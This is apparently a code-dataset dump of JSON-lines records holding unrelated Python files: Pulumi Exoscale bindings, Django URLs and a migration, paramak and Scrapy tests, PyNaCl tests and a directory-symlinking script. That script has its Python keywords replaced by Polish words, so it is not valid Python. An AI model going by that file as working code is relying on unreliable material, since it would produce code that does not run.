Usage\n\n ```python\n import pulumi\n import pulumi_exoscale as exoscale\n\n zone = \"ch-gva-2\"\n web = exoscale.get_anti_affinity_group(name=\"web\")\n ubuntu = exoscale.get_compute_template(zone=zone,\n name=\"Linux Ubuntu 20.04 LTS 64-bit\")\n my_server = exoscale.ComputeInstance(\"my-server\",\n zone=zone,\n type=\"standard.medium\",\n template_id=ubuntu.id,\n disk_size=20,\n anti_affinity_group_ids=[web.id])\n ```\n\n\n :param str id: The ID of the Anti-Affinity Group (conflicts with `name`).\n :param str name: The name of the Anti-Affinity Group (conflicts with `id`).\n \"\"\"\n __args__ = dict()\n __args__['id'] = id\n __args__['name'] = name\n if opts is None:\n opts = pulumi.InvokeOptions()\n if opts.version is None:\n opts.version = _utilities.get_version()\n __ret__ = pulumi.runtime.invoke('exoscale:index/getAntiAffinityGroup:getAntiAffinityGroup', __args__, opts=opts, typ=GetAntiAffinityGroupResult).value\n\n return AwaitableGetAntiAffinityGroupResult(\n id=__ret__.id,\n instances=__ret__.instances,\n name=__ret__.name)\n\n\n@_utilities.lift_output_func(get_anti_affinity_group)\ndef get_anti_affinity_group_output(id: Optional[pulumi.Input[Optional[str]]] = None,\n name: Optional[pulumi.Input[Optional[str]]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAntiAffinityGroupResult]:\n \"\"\"\n Provides information on an [Anti-Affinity Group][aag-doc] for use in other resources such as a [`Compute`][r-compute] resource.\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_exoscale as exoscale\n\n zone = \"ch-gva-2\"\n web = exoscale.get_anti_affinity_group(name=\"web\")\n ubuntu = exoscale.get_compute_template(zone=zone,\n name=\"Linux Ubuntu 20.04 LTS 64-bit\")\n my_server = exoscale.ComputeInstance(\"my-server\",\n zone=zone,\n type=\"standard.medium\",\n template_id=ubuntu.id,\n disk_size=20,\n anti_affinity_group_ids=[web.id])\n ```\n\n\n :param str id: The ID of the Anti-Affinity Group (conflicts with `name`).\n :param str name: The name of the Anti-Affinity Group (conflicts with `id`).\n \"\"\"\n ...\n"} {"ext": "py", "sha": "1a30322d7e1936cec3355bfbf561d0a3d3d83712", "content": "from students import views as students_views\r\nfrom django.urls import path\r\nfrom django.contrib.auth import views as auth_views\r\n\r\nurlpatterns = [\r\n\tpath('login/', auth_views.LoginView.as_view(template_name='students/student/login.html'), name = 'login'),\r\n\tpath('logout/', auth_views.LogoutView.as_view(template_name='students/student/logout.html'), name = 'logout'),\r\n\tpath('register/',students_views.StudentRegistrationView.as_view(), name='student_registration'),\r\n\tpath('enroll-course/',students_views.StudentEnrollCourseView.as_view(), name='student_enroll_course'),\r\n\tpath('courses/', students_views.StudentCourseListView.as_view(), name='student_course_list'),\r\n\tpath('course//', students_views.StudentCourseDetailView.as_view(), name='student_course_detail'),\r\n\tpath('course///', students_views.StudentCourseDetailView.as_view(), name='student_course_detail_module'),\r\n]"} {"ext": "py", "sha": "1a303245c72a284cd75bda66d762438a81461f37", "content": "import os\nimport unittest\nfrom pathlib import Path\n\nimport paramak\nimport pytest\n\n\nclass test_object_properties(unittest.TestCase):\n def test_shape_default_properties(self):\n \"\"\"Creates a Shape object and checks that the points attribute has\n a default of None.\"\"\"\n\n test_shape = paramak.Shape()\n\n assert test_shape.points is None\n\n def test_incorrect_workplane(self):\n \"\"\"Creates Shape object with incorrect workplane and checks ValueError\n is raised.\"\"\"\n\n test_shape = paramak.Shape()\n\n def incorrect_workplane():\n \"\"\"Creates Shape object with unacceptable workplane.\"\"\"\n\n test_shape.workplane = \"ZY\"\n\n self.assertRaises(ValueError, incorrect_workplane)\n\n def test_incorrect_points(self):\n \"\"\"Creates Shape objects and checks errors are raised correctly when\n specifying points.\"\"\"\n\n test_shape = paramak.Shape()\n\n def incorrect_points_end_point_is_start_point():\n \"\"\"Checks ValueError is raised when the start and end points are\n the same.\"\"\"\n\n test_shape.points = [(0, 200), (200, 100), (0, 0), (0, 200)]\n\n self.assertRaises(\n ValueError,\n incorrect_points_end_point_is_start_point)\n\n def incorrect_points_missing_z_value():\n \"\"\"Checks ValueError is raised when a point is missing a z\n value.\"\"\"\n\n test_shape.points = [(0, 200), (200), (0, 0), (0, 50)]\n\n self.assertRaises(ValueError, incorrect_points_missing_z_value)\n\n def incorrect_points_not_a_list():\n \"\"\"Checks ValueError is raised when the points are not a list.\"\"\"\n\n test_shape.points = (0, 0), (0, 20), (20, 20), (20, 0)\n\n self.assertRaises(ValueError, incorrect_points_not_a_list)\n\n def incorrect_points_wrong_number_of_entries():\n \"\"\"Checks ValueError is raised when individual points dont have 2\n or 3 entries.\"\"\"\n\n test_shape.points = [(0, 0), (0, 20), (20, 20, 20, 20)]\n\n self.assertRaises(ValueError, incorrect_points_wrong_number_of_entries)\n\n def incorrect_x_point_value_type():\n \"\"\"Checks ValueError is raised when X point is not a number.\"\"\"\n\n test_shape.points = [(\"string\", 0), (0, 20), (20, 20)]\n\n self.assertRaises(ValueError, incorrect_x_point_value_type)\n\n def incorrect_y_point_value_type():\n \"\"\"Checks ValueError is raised when Y point is not a number.\"\"\"\n\n test_shape.points = [(0, \"string\"), (0, 20), (20, 20)]\n\n self.assertRaises(ValueError, incorrect_y_point_value_type)\n\n def test_create_limits(self):\n \"\"\"Creates a Shape object and checks that the create_limits function\n returns the expected values for x_min, x_max, z_min and z_max.\"\"\"\n\n test_shape = paramak.Shape()\n\n test_shape.points = [\n (0, 0),\n (0, 10),\n (0, 20),\n (10, 20),\n (20, 20),\n (20, 10),\n (20, 0),\n (10, 0),\n ]\n\n assert test_shape.create_limits() == (0.0, 20.0, 0.0, 20.0)\n\n # test with a component which has a find_points method\n test_shape2 = paramak.Plasma()\n test_shape2.create_limits()\n assert test_shape2.x_min is not None\n\n def test_create_limits_error(self):\n \"\"\"Checks error is raised when no points are given.\"\"\"\n\n test_shape = paramak.Shape()\n\n def limits():\n test_shape.create_limits()\n self.assertRaises(ValueError, limits)\n\n def test_export_2d_image(self):\n \"\"\"Creates a Shape object and checks that a png file of the object with\n the correct suffix can be exported using the export_2d_image method.\"\"\"\n\n test_shape = paramak.Shape()\n test_shape.points = [(0, 0), (0, 20), (20, 20), (20, 0)]\n os.system(\"rm filename.png\")\n test_shape.export_2d_image(\"filename\")\n assert Path(\"filename.png\").exists() is True\n os.system(\"rm filename.png\")\n test_shape.export_2d_image(\"filename.png\")\n assert Path(\"filename.png\").exists() is True\n os.system(\"rm filename.png\")\n\n def test_initial_solid_construction(self):\n \"\"\"Creates a shape and checks that a cadquery solid with a unique hash\n value is created when .solid is called.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20), (20, 0)], rotation_angle=360\n )\n\n assert test_shape.hash_value is None\n assert test_shape.solid is not None\n assert type(test_shape.solid).__name__ == \"Workplane\"\n assert test_shape.hash_value is not None\n\n def test_solid_return(self):\n \"\"\"Checks that the same cadquery solid with the same unique hash value\n is returned when shape.solid is called again after no changes have been\n made to the Shape.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20), (20, 0)], rotation_angle=360\n )\n\n assert test_shape.solid is not None\n initial_hash_value = test_shape.hash_value\n assert test_shape.solid is not None\n assert initial_hash_value == test_shape.hash_value\n\n def test_conditional_solid_reconstruction(self):\n \"\"\"Checks that a new cadquery solid with a new unique hash value is\n constructed when shape.solid is called after changes to the Shape have\n been made.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)], rotation_angle=360\n )\n\n assert test_shape.solid is not None\n assert test_shape.hash_value is not None\n initial_hash_value = test_shape.hash_value\n\n test_shape.rotation_angle = 180\n\n assert test_shape.solid is not None\n assert test_shape.hash_value is not None\n assert initial_hash_value != test_shape.hash_value\n\n def test_hash_value_update(self):\n \"\"\"Checks that the hash value of a Shape is not updated until a new\n cadquery solid has been created.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)], rotation_angle=360\n )\n test_shape.solid\n assert test_shape.hash_value is not None\n initial_hash_value = test_shape.hash_value\n\n test_shape.rotation_angle = 180\n assert test_shape.hash_value == initial_hash_value\n test_shape.solid\n assert test_shape.hash_value != initial_hash_value\n\n def test_material_tag_warning(self):\n \"\"\"Checks that a warning is raised when a Shape has a material tag >\n 28 characters.\"\"\"\n\n test_shape = paramak.Shape()\n\n def warning_material_tag():\n\n test_shape.material_tag = \"abcdefghijklmnopqrstuvwxyz12345\"\n\n self.assertWarns(UserWarning, warning_material_tag)\n\n def test_invalid_material_tag(self):\n \"\"\"Checks a ValueError is raised when a Shape has an invalid material\n tag.\"\"\"\n\n test_shape = paramak.Shape()\n\n def invalid_material_tag():\n\n test_shape.material_tag = 123\n\n self.assertRaises(ValueError, invalid_material_tag)\n\n def test_export_html(self):\n \"\"\"Checks a plotly figure of the Shape is exported by the export_html\n method with the correct filename with RGB and RGBA colors.\"\"\"\n\n test_shape = paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20), (20, 0)], rotation_angle=360\n )\n\n os.system(\"rm filename.html\")\n test_shape.export_html('filename')\n assert Path(\"filename.html\").exists() is True\n os.system(\"rm filename.html\")\n test_shape.color = (1, 0, 0, 0.5)\n test_shape.export_html('filename')\n assert Path(\"filename.html\").exists() is True\n os.system(\"rm filename.html\")\n\n def test_export_html_with_points_None(self):\n \"\"\"Checks that an error is raised when points is None and export_html\n \"\"\"\n test_shape = paramak.Shape()\n\n def export():\n test_shape.export_html(\"out.html\")\n self.assertRaises(ValueError, export)\n\n def test_invalid_stp_filename(self):\n \"\"\"Checks ValueError is raised when invalid stp filenames are used.\"\"\"\n\n def invalid_filename_suffix():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stp_filename=\"filename.invalid_suffix\"\n )\n\n self.assertRaises(ValueError, invalid_filename_suffix)\n\n def invalid_filename_type():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stp_filename=123456\n )\n\n self.assertRaises(ValueError, invalid_filename_type)\n\n def test_invalid_stl_filename(self):\n \"\"\"Checks ValueError is raised when invalid stl filenames are used.\"\"\"\n\n def invalid_filename_suffix():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stl_filename=\"filename.invalid_suffix\"\n )\n\n self.assertRaises(ValueError, invalid_filename_suffix)\n\n def invalid_filename_type():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n stl_filename=123456\n )\n\n self.assertRaises(ValueError, invalid_filename_type)\n\n def test_invalid_color(self):\n \"\"\"Checks ValueError is raised when invalid colors are used.\"\"\"\n\n def invalid_color_type():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n color=255\n )\n\n self.assertRaises(ValueError, invalid_color_type)\n\n def invalid_color_length():\n\n paramak.RotateStraightShape(\n points=[(0, 0), (0, 20), (20, 20)],\n color=(255, 255, 255, 1, 1)\n )\n\n self.assertRaises(ValueError, invalid_color_length)\n\n def test_volumes_add_up_to_total_volume_Compound(self):\n \"\"\"Checks the volume and volumes attributes are correct types\n and that the volumes sum to equalt the volume for a Compound.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoilSet(\n heights=[10, 10],\n widths=[20, 20],\n center_points=[(15, 15), (50, 50)]\n )\n\n assert isinstance(test_shape.volume, float)\n assert isinstance(test_shape.volumes, list)\n assert isinstance(test_shape.volumes[0], float)\n assert isinstance(test_shape.volumes[1], float)\n assert len(test_shape.volumes) == 2\n assert sum(test_shape.volumes) == pytest.approx(test_shape.volume)\n\n def test_volumes_add_up_to_total_volume(self):\n \"\"\"Checks the volume and volumes attributes are correct types\n and that the volumes sum to equalt the volume.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50\n )\n\n assert isinstance(test_shape.volume, float)\n assert isinstance(test_shape.volumes, list)\n assert isinstance(test_shape.volumes[0], float)\n assert len(test_shape.volumes) == 1\n assert sum(test_shape.volumes) == pytest.approx(test_shape.volume)\n\n def test_areas_add_up_to_total_area_Compound(self):\n \"\"\"Checks the area and areas attributes are correct types\n and that the areas sum to equalt the area for a Compound.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoilSet(\n heights=[10, 10],\n widths=[20, 20],\n center_points=[(15, 15), (50, 50)]\n )\n\n assert isinstance(test_shape.area, float)\n assert isinstance(test_shape.areas, list)\n assert isinstance(test_shape.areas[0], float)\n assert isinstance(test_shape.areas[1], float)\n assert isinstance(test_shape.areas[2], float)\n assert isinstance(test_shape.areas[3], float)\n assert isinstance(test_shape.areas[4], float)\n assert isinstance(test_shape.areas[5], float)\n assert isinstance(test_shape.areas[6], float)\n assert isinstance(test_shape.areas[7], float)\n assert len(test_shape.areas) == 8\n assert sum(test_shape.areas) == pytest.approx(test_shape.area)\n\n def test_areas_add_up_to_total_area(self):\n \"\"\"Checks the area and areas attributes are correct types\n and that the areas sum to equalt the area.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50\n )\n\n assert isinstance(test_shape.area, float)\n assert isinstance(test_shape.areas, list)\n assert isinstance(test_shape.areas[0], float)\n assert isinstance(test_shape.areas[1], float)\n assert isinstance(test_shape.areas[2], float)\n assert isinstance(test_shape.areas[3], float)\n assert len(test_shape.areas) == 4\n assert sum(test_shape.areas) == pytest.approx(test_shape.area)\n\n def test_trace(self):\n \"\"\"Test trace method is populated\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50,\n name=\"coucou\"\n )\n assert test_shape._trace() is not None\n\n def test_create_patch_error(self):\n \"\"\"Checks _create_patch raises a ValueError when points is None.\"\"\"\n\n test_shape = paramak.Shape()\n\n def patch():\n test_shape._create_patch()\n self.assertRaises(ValueError, patch)\n\n def test_create_patch_alpha(self):\n \"\"\"Checks _create_patch returns a patch when alpha is given.\"\"\"\n\n test_shape = paramak.PoloidalFieldCoil(\n center_point=(100, 100),\n height=50,\n width=50,\n color=(0.5, 0.5, 0.5, 0.1)\n )\n assert test_shape._create_patch() is not None\n\n def test_azimuth_placement_angle_error(self):\n \"\"\"Checks an error is raised when invalid value for\n azimuth_placement_angle is set.\n \"\"\"\n\n test_shape = paramak.Shape()\n\n def angle_str():\n test_shape.azimuth_placement_angle = \"coucou\"\n\n def angle_str_in_Iterable():\n test_shape.azimuth_placement_angle = [0, \"coucou\"]\n\n self.assertRaises(ValueError, angle_str)\n self.assertRaises(ValueError, angle_str_in_Iterable)\n\n def test_name_error(self):\n \"\"\"Checks an error is raised when invalid value for name is set.\"\"\"\n\n test_shape = paramak.Shape()\n\n def name_float():\n test_shape.name = 2.0\n\n def name_int():\n test_shape.name = 1\n\n def name_list():\n test_shape.name = ['coucou']\n\n self.assertRaises(ValueError, name_float)\n self.assertRaises(ValueError, name_int)\n self.assertRaises(ValueError, name_list)\n\n def test_tet_mesh_error(self):\n \"\"\"Checks an error is raised when invalid value for tet_mesh is set.\n \"\"\"\n\n test_shape = paramak.Shape()\n\n def tet_mesh_float():\n test_shape.tet_mesh = 2.0\n\n def tet_mesh_int():\n test_shape.tet_mesh = 1\n\n def tet_mesh_list():\n test_shape.tet_mesh = ['coucou']\n\n self.assertRaises(ValueError, tet_mesh_float)\n self.assertRaises(ValueError, tet_mesh_int)\n self.assertRaises(ValueError, tet_mesh_list)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a30325f5d4164daea8c87fa9097fd7f33691106", "content": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.18 on 2019-02-02 02:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('analytics', '0012_add_on_delete'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='installationcount',\n name='anomaly',\n ),\n migrations.RemoveField(\n model_name='realmcount',\n name='anomaly',\n ),\n migrations.RemoveField(\n model_name='streamcount',\n name='anomaly',\n ),\n migrations.RemoveField(\n model_name='usercount',\n name='anomaly',\n ),\n migrations.DeleteModel(\n name='Anomaly',\n ),\n ]\n"} {"ext": "py", "sha": "1a30344239c042a1e6ef36359372f2b2b353fca3", "content": "\"\"\"This file is part of Splitter which is released under MIT License.\n\nagg.py defines aggregation functions\n\"\"\"\n\nfrom splitter.dataflow.validation import check_metrics_and_filters, countable\nfrom splitter.struct import IteratorVideoStream\nfrom splitter.dataflow.xform import Null\n\nimport logging\nimport time\nimport itertools\n\ndef count(stream, keys, stats=False):\n\t\"\"\"Count counts the true hits of a defined event.\n\t\"\"\"\n\n\t#actual logic is here\n\tcounter = {}\n\tframe_count = 0\n\tnow = time.time()\n\tfor frame in stream:\n\t\tframe_count += 1\n\n\t\tif frame_count == 1:\n\t\t\tlogging.info(\"Processing first frame of stream\")\n\n\t\tfor key in keys:\n\t\t\tif frame[key]:\n\t\t\t\tsubkey = key + '_' + str(frame[key])\n\t\t\t\tcounter[subkey] = counter.get(subkey,0) + 1\n\n\t# profiling\n\tfor obj in stream.lineage():\n\t\tif hasattr(obj, \"time_elapsed\"):\n\t\t\tlogging.info(\"%s: %s\" % (type(obj).__name__, obj.time_elapsed))\n\t\telse:\n\t\t\tlogging.info(\"%s time not measured\" % type(obj).__name__)\n\n\tif not stats:\n\t\treturn counter\n\telse:\n\t\treturn counter, {'frames': frame_count, \\\n\t\t\t\t\t\t 'elapsed': (time.time() - now)}\n\ndef counts(streams, keys, stats=False):\n\t\"\"\"Count counts the true hits of a defined event.\n\t\"\"\"\n\tstream = IteratorVideoStream(itertools.chain(*streams), streams)\n\n\tlineage = []\n\tfor s in streams:\n\t\tlineage.extend(s.lineage())\n\n\tstream.global_lineage = lineage\n\n\treturn count(stream, keys, stats)\n\n\ndef get(stream, key, frame_rate=-1):\n\tif frame_rate == -1:\n\t\treturn [(v['frame'], v['data']) for v in stream if v[key]]\n\telse:\n\t\treturn [( int(v['frame']/frame_rate) , v['data']) for v in stream if v[key]]\n"} {"ext": "py", "sha": "1a303659262fe745e6841a0210726edee312644d", "content": "# Copyright 2013 Donald Stufft and individual contributors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport nacl.utils\n\n\ndef test_random_bytes_produces():\n assert len(nacl.utils.random(16)) == 16\n\n\ndef test_random_bytes_produces_different_bytes():\n assert nacl.utils.random(16) != nacl.utils.random(16)\n"} {"ext": "py", "sha": "1a30368ba432bca7020336b00c15858178716151", "content": "import os\nimport sys\nimport subprocess\nimport tempfile\nfrom time import sleep\nfrom os.path import exists, join, abspath\nfrom shutil import rmtree, copytree\nfrom tempfile import mkdtemp\nimport six\n\nfrom twisted.trial import unittest\nfrom twisted.internet import defer\n\nimport scrapy\nfrom scrapy.utils.python import to_native_str\nfrom scrapy.utils.python import retry_on_eintr\nfrom scrapy.utils.test import get_testenv\nfrom scrapy.utils.testsite import SiteTest\nfrom scrapy.utils.testproc import ProcessTest\n\n\nclass ProjectTest(unittest.TestCase):\n project_name = 'testproject'\n\n def setUp(self):\n self.temp_path = mkdtemp()\n self.cwd = self.temp_path\n self.proj_path = join(self.temp_path, self.project_name)\n self.proj_mod_path = join(self.proj_path, self.project_name)\n self.env = get_testenv()\n\n def tearDown(self):\n rmtree(self.temp_path)\n\n def call(self, *new_args, **kwargs):\n with tempfile.TemporaryFile() as out:\n args = (sys.executable, '-m', 'scrapy.cmdline') + new_args\n return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd,\n env=self.env, **kwargs)\n\n def proc(self, *new_args, **kwargs):\n args = (sys.executable, '-m', 'scrapy.cmdline') + new_args\n p = subprocess.Popen(args, cwd=self.cwd, env=self.env,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n **kwargs)\n\n waited = 0\n interval = 0.2\n while p.poll() is None:\n sleep(interval)\n waited += interval\n if waited > 15:\n p.kill()\n assert False, 'Command took too much time to complete'\n\n return p\n\n\nclass StartprojectTest(ProjectTest):\n\n def test_startproject(self):\n self.assertEqual(0, self.call('startproject', self.project_name))\n\n assert exists(join(self.proj_path, 'scrapy.cfg'))\n assert exists(join(self.proj_path, 'testproject'))\n assert exists(join(self.proj_mod_path, '__init__.py'))\n assert exists(join(self.proj_mod_path, 'items.py'))\n assert exists(join(self.proj_mod_path, 'pipelines.py'))\n assert exists(join(self.proj_mod_path, 'settings.py'))\n assert exists(join(self.proj_mod_path, 'spiders', '__init__.py'))\n\n self.assertEqual(1, self.call('startproject', self.project_name))\n self.assertEqual(1, self.call('startproject', 'wrong---project---name'))\n self.assertEqual(1, self.call('startproject', 'sys'))\n\n\nclass StartprojectTemplatesTest(ProjectTest):\n\n def setUp(self):\n super(StartprojectTemplatesTest, self).setUp()\n self.tmpl = join(self.temp_path, 'templates')\n self.tmpl_proj = join(self.tmpl, 'project')\n\n def test_startproject_template_override(self):\n copytree(join(scrapy.__path__[0], 'templates'), self.tmpl)\n with open(join(self.tmpl_proj, 'root_template'), 'w'):\n pass\n assert exists(join(self.tmpl_proj, 'root_template'))\n\n args = ['--set', 'TEMPLATES_DIR=%s' % self.tmpl]\n p = self.proc('startproject', self.project_name, *args)\n out = to_native_str(retry_on_eintr(p.stdout.read))\n self.assertIn(\"New Scrapy project %r, using template directory\" % self.project_name, out)\n self.assertIn(self.tmpl_proj, out)\n assert exists(join(self.proj_path, 'root_template'))\n\n\nclass CommandTest(ProjectTest):\n\n def setUp(self):\n super(CommandTest, self).setUp()\n self.call('startproject', self.project_name)\n self.cwd = join(self.temp_path, self.project_name)\n self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name\n\n\nclass GenspiderCommandTest(CommandTest):\n\n def test_arguments(self):\n # only pass one argument. spider script shouldn't be created\n self.assertEqual(2, self.call('genspider', 'test_name'))\n assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))\n # pass two arguments . spider script should be created\n self.assertEqual(0, self.call('genspider', 'test_name', 'test.com'))\n assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))\n\n def test_template(self, tplname='crawl'):\n args = ['--template=%s' % tplname] if tplname else []\n spname = 'test_spider'\n p = self.proc('genspider', spname, 'test.com', *args)\n out = to_native_str(retry_on_eintr(p.stdout.read))\n self.assertIn(\"Created spider %r using template %r in module\" % (spname, tplname), out)\n self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))\n p = self.proc('genspider', spname, 'test.com', *args)\n out = to_native_str(retry_on_eintr(p.stdout.read))\n self.assertIn(\"Spider %r already exists in module\" % spname, out)\n\n def test_template_basic(self):\n self.test_template('basic')\n\n def test_template_csvfeed(self):\n self.test_template('csvfeed')\n\n def test_template_xmlfeed(self):\n self.test_template('xmlfeed')\n\n def test_list(self):\n self.assertEqual(0, self.call('genspider', '--list'))\n\n def test_dump(self):\n self.assertEqual(0, self.call('genspider', '--dump=basic'))\n self.assertEqual(0, self.call('genspider', '-d', 'basic'))\n\n def test_same_name_as_project(self):\n self.assertEqual(2, self.call('genspider', self.project_name))\n assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))\n\n\nclass MiscCommandsTest(CommandTest):\n\n def test_list(self):\n self.assertEqual(0, self.call('list'))\n\n\nclass RunSpiderCommandTest(CommandTest):\n\n def test_runspider(self):\n tmpdir = self.mktemp()\n os.mkdir(tmpdir)\n fname = abspath(join(tmpdir, 'myspider.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nimport scrapy\n\nclass MySpider(scrapy.Spider):\n name = 'myspider'\n\n def start_requests(self):\n self.logger.debug(\"It Works!\")\n return []\n\"\"\")\n p = self.proc('runspider', fname)\n log = to_native_str(p.stderr.read())\n self.assertIn(\"DEBUG: It Works!\", log)\n self.assertIn(\"INFO: Spider opened\", log)\n self.assertIn(\"INFO: Closing spider (finished)\", log)\n self.assertIn(\"INFO: Spider closed (finished)\", log)\n\n def test_runspider_no_spider_found(self):\n tmpdir = self.mktemp()\n os.mkdir(tmpdir)\n fname = abspath(join(tmpdir, 'myspider.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nfrom scrapy.spiders import Spider\n\"\"\")\n p = self.proc('runspider', fname)\n log = to_native_str(p.stderr.read())\n self.assertIn(\"No spider found in file\", log)\n\n def test_runspider_file_not_found(self):\n p = self.proc('runspider', 'some_non_existent_file')\n log = to_native_str(p.stderr.read())\n self.assertIn(\"File not found: some_non_existent_file\", log)\n\n def test_runspider_unable_to_load(self):\n tmpdir = self.mktemp()\n os.mkdir(tmpdir)\n fname = abspath(join(tmpdir, 'myspider.txt'))\n with open(fname, 'w') as f:\n f.write(\"\")\n p = self.proc('runspider', fname)\n log = to_native_str(p.stderr.read())\n self.assertIn(\"Unable to load\", log)\n\n\nclass ParseCommandTest(ProcessTest, SiteTest, CommandTest):\n command = 'parse'\n\n def setUp(self):\n super(ParseCommandTest, self).setUp()\n self.spider_name = 'parse_spider'\n fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nimport scrapy\n\nclass MySpider(scrapy.Spider):\n name = '{0}'\n\n def parse(self, response):\n if getattr(self, 'test_arg', None):\n self.logger.debug('It Works!')\n return [scrapy.Item(), dict(foo='bar')]\n\"\"\".format(self.spider_name))\n\n fname = abspath(join(self.proj_mod_path, 'pipelines.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nimport logging\n\nclass MyPipeline(object):\n component_name = 'my_pipeline'\n\n def process_item(self, item, spider):\n logging.info('It Works!')\n return item\n\"\"\")\n\n fname = abspath(join(self.proj_mod_path, 'settings.py'))\n with open(fname, 'a') as f:\n f.write(\"\"\"\nITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1}\n\"\"\" % self.project_name)\n\n @defer.inlineCallbacks\n def test_spider_arguments(self):\n _, _, stderr = yield self.execute(['--spider', self.spider_name,\n '-a', 'test_arg=1',\n '-c', 'parse',\n self.url('/html')])\n self.assertIn(\"DEBUG: It Works!\", to_native_str(stderr))\n\n @defer.inlineCallbacks\n def test_pipelines(self):\n _, _, stderr = yield self.execute(['--spider', self.spider_name,\n '--pipelines',\n '-c', 'parse',\n self.url('/html')])\n self.assertIn(\"INFO: It Works!\", to_native_str(stderr))\n\n @defer.inlineCallbacks\n def test_parse_items(self):\n status, out, stderr = yield self.execute(\n ['--spider', self.spider_name, '-c', 'parse', self.url('/html')]\n )\n self.assertIn(\"\"\"[{}, {'foo': 'bar'}]\"\"\", to_native_str(out))\n\n\n\nclass BenchCommandTest(CommandTest):\n\n def test_run(self):\n p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001',\n '-s', 'CLOSESPIDER_TIMEOUT=0.01')\n log = to_native_str(p.stderr.read())\n self.assertIn('INFO: Crawled', log)\n self.assertNotIn('Unhandled Error', log)\n"} {"ext": "py", "sha": "1a3036958a98967887dd32d7ac1c61f266b30daa", "content": "#! /usr/bin/env python3\n\n# linktree\n#\n# Make a copy of a directory tree przy symbolic links to all files w the\n# original tree.\n# All symbolic links go to a special symbolic link at the top, so you\n# can easily fix things jeżeli the original source tree moves.\n# See also \"mkreal\".\n#\n# usage: mklinks oldtree newtree\n\nzaimportuj sys, os\n\nLINK = '.LINK' # Name of special symlink at the top.\n\ndebug = 0\n\ndef main():\n jeżeli nie 3 <= len(sys.argv) <= 4:\n print('usage:', sys.argv[0], 'oldtree newtree [linkto]')\n zwróć 2\n oldtree, newtree = sys.argv[1], sys.argv[2]\n jeżeli len(sys.argv) > 3:\n link = sys.argv[3]\n link_may_fail = 1\n inaczej:\n link = LINK\n link_may_fail = 0\n jeżeli nie os.path.isdir(oldtree):\n print(oldtree + ': nie a directory')\n zwróć 1\n spróbuj:\n os.mkdir(newtree, 0o777)\n wyjąwszy OSError jako msg:\n print(newtree + ': cannot mkdir:', msg)\n zwróć 1\n linkname = os.path.join(newtree, link)\n spróbuj:\n os.symlink(os.path.join(os.pardir, oldtree), linkname)\n wyjąwszy OSError jako msg:\n jeżeli nie link_may_fail:\n print(linkname + ': cannot symlink:', msg)\n zwróć 1\n inaczej:\n print(linkname + ': warning: cannot symlink:', msg)\n linknames(oldtree, newtree, link)\n zwróć 0\n\ndef linknames(old, new, link):\n jeżeli debug: print('linknames', (old, new, link))\n spróbuj:\n names = os.listdir(old)\n wyjąwszy OSError jako msg:\n print(old + ': warning: cannot listdir:', msg)\n zwróć\n dla name w names:\n jeżeli name nie w (os.curdir, os.pardir):\n oldname = os.path.join(old, name)\n linkname = os.path.join(link, name)\n newname = os.path.join(new, name)\n jeżeli debug > 1: print(oldname, newname, linkname)\n jeżeli os.path.isdir(oldname) oraz \\\n nie os.path.islink(oldname):\n spróbuj:\n os.mkdir(newname, 0o777)\n ok = 1\n wyjąwszy:\n print(newname + \\\n ': warning: cannot mkdir:', msg)\n ok = 0\n jeżeli ok:\n linkname = os.path.join(os.pardir,\n linkname)\n linknames(oldname, newname, linkname)\n inaczej:\n os.symlink(linkname, newname)\n\njeżeli __name__ == '__main__':\n sys.exit(main())\n"} {"ext": "py", "sha": "1a30372249f51bead4c5c0d4d412fe2f179192bb", "content": "# -*- coding: utf-8 -*-\n\n# Copyright (C) 2006 Joe Wreschnig\n#\n# This program is 